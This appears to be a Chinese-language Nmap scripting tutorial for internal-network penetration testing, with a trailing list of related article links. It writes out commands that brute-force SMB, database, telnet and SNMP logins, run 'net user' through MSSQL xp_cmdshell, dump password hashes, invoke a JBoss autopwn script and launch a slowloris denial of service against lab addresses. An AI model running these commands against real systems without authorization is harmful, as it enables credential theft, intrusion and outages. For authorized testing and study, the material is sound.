nmap指令碼使用總結
0x00 前言:
nmap的基本介紹和基本使用方法,在烏雲知識庫中已經有人提交過,講的比較詳細,在此文中就不再講述。 具體連結:/tips/?id=2002
本文主要講解nmap的眾多指令碼的使用,在內網滲透的時候尤其好用。
0x01 nmap按指令碼分類掃描
nmap指令碼主要分為以下幾類,在掃描時可根據需要設定--script=類別這種方式進行比較籠統的掃描:
auth: 負責處理鑑權證書(繞開鑑權)的指令碼
broadcast: 在區域網內探查更多服務開啟狀況,如dhcp/dns/sqlserver等服務
brute: 提供暴力破解方式,針對常見的應用如http/snmp等
default: 使用-sC或-A選項掃描時候預設的指令碼,提供基本指令碼掃描能力
discovery: 對網路進行更多的資訊,如SMB列舉、SNMP查詢等
dos: 用於進行拒絕服務攻擊
exploit: 利用已知的漏洞入侵系統
external: 利用第三方的資料庫或資源,例如進行whois解析
fuzzer: 模糊測試的指令碼,傳送異常的包到目標機,探測出潛在漏洞 intrusive: 入侵性的指令碼,此類指令碼可能引發對方的IDS/IPS的記錄或遮蔽
malware: 探測目標機是否感染了病毒、開啟了後門等資訊
safe: 此類與intrusive相反,屬於安全性指令碼
version: 負責增強服務與版本掃描(Version Detection)功能的指令碼
vuln: 負責檢查目標機是否有常見的漏洞(Vulnerability),如是否有MS08_067
部分使用截圖:
(1) nmap --script=auth 192.168.137.*
負責處理鑑權證書(繞開鑑權)的指令碼,也可以作為檢測部分應用弱口令
(2)nmap --script=brute 192.168.137.*
提供暴力破解的方式 可對資料庫,smb,snmp等進行簡單密碼的暴力猜解
(3)nmap --script=default 192.168.137.*
或者 nmap -sC 192.168.137.*
預設的指令碼掃描,主要是蒐集各種應用服務的資訊,收集到後,可再針對具體服務進行攻擊
(4)nmap --script=vuln 192.168.137.*
檢查是否存在常見漏洞
(5)nmap -n -p445 --script=broadcast 192.168.137.4
在區域網內探查更多服務開啟狀況
(6)nmap --script external 202.103.243.110
利用第三方的資料庫或資源,例如進行whois解析
0x02 nmap按應用服務掃描
(1)vnc掃描:
檢查vnc bypass
#!bash
nmap --script=realvnc-auth-bypass 192.168.137.4
檢查vnc認證方式
#!bash
nmap --script=vnc-auth 192.168.137.4
獲取vnc資訊
#!bash
nmap --script=vnc-info 192.168.137.4
(2)smb掃描:
smb破解
#!bash
nmap --script=smb-brute.nse 192.168.137.4
smb字典破解
#!bash
nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
smb已知幾個嚴重漏
#!bash
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4
檢視共享目錄
#!bash
nmap -p 445 --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4
查詢主機一些敏感資訊(注:需要下載nmap_service)
#!bash
nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test 192.168.137.4
檢視會話
#!bash
nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
系統資訊
#!bash
nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
(3)Mssql掃描:
猜解mssql使用者名稱和密碼
#!bash
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
xp_cmdshell 執行命令
#!bash
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4
dumphash值
#!bash
nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 192.168.137.4
(4)Mysql掃描:
掃描root空口令
#!bash
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4
列出所有mysql使用者
#!bash
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4
支援同一應用的所有指令碼掃描
#!bash
nmap --script=mysql-* 192.168.137.4
(5)Oracle掃描:
oracle sid掃描
#!bash
nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5
oracle弱口令破解
#!bash
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5
(6)其他一些比較好用的指令碼
nmap --script=broadcast-netbios-master-browser 192.168.137.4 發現閘道器
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 破解rsync
nmap --script informix-brute -p 9088 192.168.137.4 informix資料庫破解
nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解
nmap -sU --script snmp-brute 192.168.137.4 snmp破解
nmap -sV --script=telnet-brute 192.168.137.4 telnet破解
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target> jboss autopwn
nmap --script=http-methods.nse 192.168.137.4 檢查http方法
nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻擊,對於處理能力較小的站點還挺好用的 'half-HTTP' connections
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4
(7)不靠譜的指令碼:
vnc-brute 次數多了會禁止連線
pcanywhere-brute 同上
0x03 學會指令碼分析
nmap中指令碼並不難看懂,所以在使用時如果不知道原理可以直接看利用指令碼即可,也可以修改其中的某些引數方便自己使用。
舉例:
關於oracle的弱口令破解:
呼叫過程:oracle-brute.nse >> oracle-default-accounts.lst
首先是呼叫破解指令碼:
根據指令碼中字典的位置去檢視預設字典,當然也可以將破解的字元自行新增其中,或者是修改指令碼或引數改變破解字典:
相關文章
- nmap指令碼詳解2023-01-14指令碼
- Nmap指令整理2018-10-26
- bash 指令碼總結2017-05-25指令碼
- shell指令碼總結2024-10-19指令碼
- mongoDB 小指令碼總結2016-01-10MongoDB指令碼
- 使用sqlplus批量執行指令碼的總結2016-07-07SQL指令碼
- bash shell指令碼執行方法總結2014-02-19指令碼
- Vue 指令總結2019-07-25Vue
- Android cmake命令總結以及指令碼模板2019-02-18Android指令碼
- Jenkins 指令碼命令列應用總結2022-04-05Jenkins指令碼命令列
- 《shell指令碼if..then..elif..then.if語句的總結》2014-06-01指令碼
- nmap使用指南2022-03-26
- github常用指令總結2019-03-12Github
- shell指令碼之特殊符號總結性梳理2016-09-22指令碼符號
- Mongodb總結1-啟動和Shell指令碼2015-10-12MongoDB指令碼
- JAVA與groovy指令碼的結合使用2017-03-28Java指令碼
- 044 內建指令總結2024-10-23
- shell指令碼呼叫java jar包 的問題總結2016-10-07指令碼JavaJAR
- Shell指令碼程式設計總結及速查手冊2016-07-23指令碼程式設計
- nmap終極使用指南2017-10-26
- 多程式PHP指令碼實現海量資料轉移總結2019-05-12PHP指令碼
- Redis使用Lua指令碼2019-06-27Redis指令碼
- .net中 使用指令碼2009-02-05指令碼
- mystat指令碼以及使用2011-05-10指令碼
- 資料統計指令碼(彙總)2018-07-23指令碼
- 使用批處理指令碼或SHELL配合SQL指令碼2010-11-19指令碼SQL
- nGrinder中快速編寫groovy指令碼01-指令碼結構2019-08-27指令碼
- SVN使用總結2020-04-06
- Git 使用總結2019-02-27Git
- Vuex使用總結2019-05-22Vue
- Toolbar使用總結2019-04-20
- Gson使用總結2019-05-06
- Ajax使用總結2019-02-14
- HelloCharts 使用總結2019-01-19
- Nginx使用總結2018-12-22Nginx
- VUE 使用總結2018-11-03Vue
- npm使用總結2018-07-15NPM
- 前端this使用總結2020-12-10前端